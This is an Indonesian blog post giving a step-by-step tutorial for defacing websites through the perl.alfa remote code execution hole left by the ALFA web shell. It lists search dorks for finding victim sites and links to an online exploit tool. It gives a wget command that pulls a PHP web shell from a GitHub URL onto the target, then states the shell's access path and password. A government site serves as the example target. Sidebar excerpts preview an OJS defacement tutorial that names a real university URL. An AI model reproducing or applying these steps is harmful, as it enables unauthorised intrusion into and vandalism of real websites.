Tutorial Deface Poc Alfa RCE perl.alfa

 



Assalamualaikum wr.wb


Kembali lagi bersama saya yang ganteng ini. Kali ini saya akan membagikan Tutorial Deface Poc RCE perl.alfa Upload Shell


Ok tanpa bersendau gurau di awal langsung saja kita siapkan bahannya.




Untuk bahan yang perlu kalian siapkan adalah:



1. Dork 


2. Tools Exploit nya, disini gw make tools dari exploit.my.id

Untuk tools nya buka aja ini url nya:

http://v1.exploits.my.id:1337/?tools=perlalfa 


3. Shell dalam bentuk txt yg di taruh di github / pastebin. Disini saya akan memakai dari github. Link shell yang saya pakai:

https://raw.githubusercontent.com/mrquixter/quixter-ohct/main/qxtrbyp.php


Untuk dork, kalian bisa gunakan:

/alfacgiapi/perl.alfa "2020"

/alfacgiapi/perl.alfa "2021"

/alfacgiapi/perl.alfa "28"

/alfacgiapi/perl.alfa "1"


Kembangin sendiri ga usah manja!


Jika semua bahan sudah siap dan kalian sudah menemukan targetnya, mari kita eksekusi.



Pertama silahkan buka website target dan lihat web nya vuln atau tidak.



Perhatikan!! 

Pertama harus ada file bernama perl.alfa

Jika target kalian sudah file perl.alfa silahkan kalian buka file nya dengan cara klik file tersebut.

Jika tampilannya blank putih, berarti vuln.

Jika file terdownload, not permission, dll. Berarti tidak vuln, silahkan cari website lain.




Ok jika kalian buka web nya dan ternyata vuln, langsung saja buka tools nya yang url nya saya sediakan di atas tadi.



Pada bagian kolom paling atas, silahkan isikan dengan url target kalian. 


Contoh:

https://indonesia.go.id/images/ALFA_DATA/alfacgiapi/perl.alfa





Jika sudah, pada bagian kolom "COMMAND" isikan perintah sebagai berikut:


wget -O quixtergans.php https://raw.githubusercontent.com/mrquixter/quixter-ohct/main/qxtrbyp.php



Contoh:




Jika sudah, langsung saja kalian klik tombol "GASKAN"


Jika shell kalian sukses terupload, maka tampilannya akan seperti ini:



Jika muncul tulisan:

"Command nya salah / web nya kgk vuln nich"


Kemungkinan memang command kalian salah, saran saya kalian copy aja command yang saya kasih di atas. Tinggal copas.




Jika shell sudah sukses terupload, cara aksesnya adalah kalian buka page:

 /ALFA_DATA/alfacgialfa/

nanti shell kalian akan muncul di sana.


Contoh:



Tuh muncul quixtergans.php 

Password shell:

090619


Tinggal kalian buka aja. Gimana? Sangat mudah sekali kan?



Ok sekian dulu tutorial pada kali ini, apabila ada kurang ketika saya menjelaskan, saya mohon maaf. Silahkan tinggalkan komentar kalian ya.




Terimakasih.




#mr.quixter #mrquixter #onehatcyberteam #tutorial #deface #poc #perlalfa #alfarce #hacking 


Komentar

Posting Komentar

Postingan populer dari blog ini

Tutorial Deface Poc Open Journal System (OJS)

Gambar
Assalamualaikum wr.wb Kembali lagi bersama gwa Mr. Quixter yang sangat ganteng. Kali ini saya akan membagikan tutorial Deface poc OJS  (Open  Journal  System) Bahan pertama yg perlu disiapkan adalah; 1. Hp/Laptop 2. Koneksi internet 3. Dork 4. Exploit 5. Shell dengan ext .phtml / Sc Deface ext .html 6. Kesabaran 7. Cewe biar tambah semangat. Tapi kalo lu wibu ga usah!! Ihhh wibuuuu Ok. Jika semua bahan sudah siap langsung kita gaskeun!!. Pertama, silahkan kalian buka search engine kebanggaan kalian. Disini gwa make chrome. 2. Silahkan lakukan dorking pada search engine kalian. Dork:  "Open Journal System" site:.. inurl:jour site:... Kembangin sendiri blog jangan manja. Nah tuh orang ganteng dapet target; http://www.univagora.ro/jour/index.php/index/index Nah, kalo dah dapet targetnya, silahkan kalian masukkan exploitnya. Yaitu dengan menambahkan: /files Di depan index.php Jadinya gini: http://www.univagora.ro/jour/files Nah, kalau misalkan web itu vuln, maka akan muncul tampi
Baca selengkapnya

Cara Unreg Atau Menonaktifkan Nomor All Operator

Gambar
  Sejak 2017 lalu , Kementerian Komunikasi dan Informatika (Kominfo) telah memutuskan bahwa semua nomor kartu prabayar dari berbagai operator terlebih dahulu harus melalui tahapan registrasi menggunakan Nomor Induk Kependudukan (NIK). Hal ini berguna agar mencegah penyalahgunaan nomor pelanggan terutama pelanggan prabayar. Registrasi ini juga berfungsi sebagai upaya perlindungan konsumen dari berbagai penipuan maupun tindak kejahatan lainnya. Lantas bagaimana jika kartu prabayar sudah tidak digunakan lagi? Bagi sebagian orang tentu akan langsung membuang atau menyimpannya begitu saja. Namun perlu menjadi perhatian, sebelum membuang kartu SIM, pengguna sebaiknya perlu menghapus data pribadi yang telah terdaftar dengan cara unreg kartu SIM atau menon-aktifkannya. Lantas bagaimana cara unreg kartu Axis lewat SMS? Berikut ini Blogspot Mr. Quixter bagikan cara unreg kartu Axis lewat SMS 1. Cara unreg kartu Axis lewat SMS Buka menu “Pesan” di ponsel Anda Ketik UNREG (tanda p
Baca selengkapnya